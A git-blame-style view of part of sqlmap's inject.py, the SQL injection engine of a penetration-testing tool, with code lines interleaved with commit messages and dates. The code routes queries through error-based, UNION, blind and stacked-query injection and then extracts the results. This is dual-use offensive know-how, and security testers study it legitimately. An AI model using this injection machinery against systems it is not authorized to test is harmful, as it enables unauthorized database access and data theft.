expressionUnescaped = unescaper.unescape(expressionReplaced)
else:
expressionUnescaped = unescaper.unescape(expression)
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
forgedPayload = safeStringFormat(payload, expressionUnescaped)
result = Request.queryPage(urlencode(forgedPayload), content=True)
removed temp dictionary and replaced with kb.misc
2010-10-20 03:00:19 +04:00
match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE)
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
if match:
output = match.group('result')
error based update
2010-10-19 18:47:13 +04:00
if output:
minor refactoring
2010-10-20 03:05:24 +04:00
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
removed temp dictionary and replaced with kb.misc
2010-10-20 03:00:19 +04:00
if kb.misc.testedDbms == 'MySQL':
major fix for MySQL error based injections
2010-10-19 19:17:16 +04:00
output = output[:-1]
update of error based injection and bug fix for --roles on MSSQL server
2010-10-20 10:40:33 +04:00
if conf.verbose > 0:
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg)
cosmetics
2010-10-19 19:28:54 +04:00
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
return output
update
2010-10-19 22:34:57 +04:00
def getValue(expression, blind=True, inband=True, error=True, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
Called each time sqlmap inject a SQL query on the SQL injection
affected parameter. It can call a function to retrieve the output
through inband SQL injection (if selected) and/or blind SQL injection
(if selected).
"""
minor cosmetic update
2010-10-11 17:52:32 +04:00
if suppressOutput:
pushValue(conf.verbose)
conf.verbose = 0
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments.
2010-03-27 02:23:25 +03:00
if conf.direct:
minor cosmetic update
2010-10-11 17:52:32 +04:00
value = direct(expression)
else:
expression = cleanQuery(expression)
expression = expandAsteriskForColumns(expression)
value = None
Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments.
2010-03-27 02:23:25 +03:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
expression = expression.replace("DISTINCT ", "")
After the storm, a restore..
2008-10-15 19:38:22 +04:00
update
2010-10-19 22:34:57 +04:00
if error and conf.errorTest:
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
value = __goError(expression)
if not value:
warnMsg = "for some reasons it was not possible to retrieve "
warnMsg += "the query output through error SQL injection "
warnMsg += "technique, sqlmap is going %s" % ("inband" if inband and kb.unionPosition else "blind")
logger.warn(warnMsg)
if inband and kb.unionPosition and not value:
minor cosmetic update
2010-10-11 17:52:32 +04:00
value = __goInband(expression, expected, sort, resumeValue, unpack, dump)
Minor bug fix with --sql-query/shell when providing a statement with DISTINCT
2010-01-05 19:15:31 +03:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
if not value:
warnMsg = "for some reasons it was not possible to retrieve "
warnMsg += "the query output through inband SQL injection "
warnMsg += "technique, sqlmap is going blind"
logger.warn(warnMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
oldParamFalseCond = kb.unionFalseCond
oldParamNegative = kb.unionNegative
kb.unionFalseCond = False
kb.unionNegative = False
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
if blind and not value:
value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
kb.unionFalseCond = oldParamFalseCond
kb.unionNegative = oldParamNegative
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
if value and isinstance(value, basestring):
value = value.strip()
After the storm, a restore..
2008-10-15 19:38:22 +04:00
minor cosmetic update
2010-10-11 17:52:32 +04:00
if suppressOutput:
conf.verbose = popValue()
Minor bug fix
2010-03-18 20:36:58 +03:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return value
Initial implementation of support for stacked queries. Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
2008-11-12 03:36:50 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
def goStacked(expression, silent=False):
Ahead with the improvements to the comparison algorithm. Added support internally to forge CASE statements, used only by --is-dba query at the moment. Allow DDL, DML (INSERT, UPDATE, etc.) from user in SQL query and SQL shell. Minor code adjustments.
2008-12-19 23:09:46 +03:00
expression = cleanQuery(expression)
Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments.
2010-03-27 02:23:25 +03:00
if conf.direct:
Added support to directly connect also to Microsoft SQL Server database. Fixed direct connection to always use the same query as of UNION query SQL injection (= one query with multiple columns/entries output). Minor fixes to Firebird/Access/SQLite connectors to use connector's execute()/fetchall() as wrapper for third-party libraries' methods. Forced conf.timeout to 10 seconds when directly connecting to database. Slightly improved regular expression to parse -d parameter. Added import check for all connectors' third-party libraries. Code refactoring: * Moved conf.direct request to direct() function in lib/request/direct.py (code reused where needed). * Back-delegated to generic connector close() and other methods.
2010-03-31 14:50:47 +04:00
return direct(expression), None
Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments.
2010-03-27 02:23:25 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
debugMsg = "query: %s" % expression
logger.debug(debugMsg)
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option
2008-12-17 00:30:24 +03:00
comment = queries[kb.dbms].comment
query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s;%s" % (query, comment))
payload = agent.payload(newValue=query)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
page, _ = Request.queryPage(payload, content=True, silent=silent)
Initial implementation of support for stacked queries. Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
2008-11-12 03:36:50 +03:00
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option
2008-12-17 00:30:24 +03:00
return payload, page
more update regarding error based injection support
2010-10-19 22:17:34 +04:00
def goError(expression):
#expression = cleanQuery(expression)
if conf.direct:
return direct(expression), None
result = __goError(expression)
return result
Reference in New Issue Copy Permalink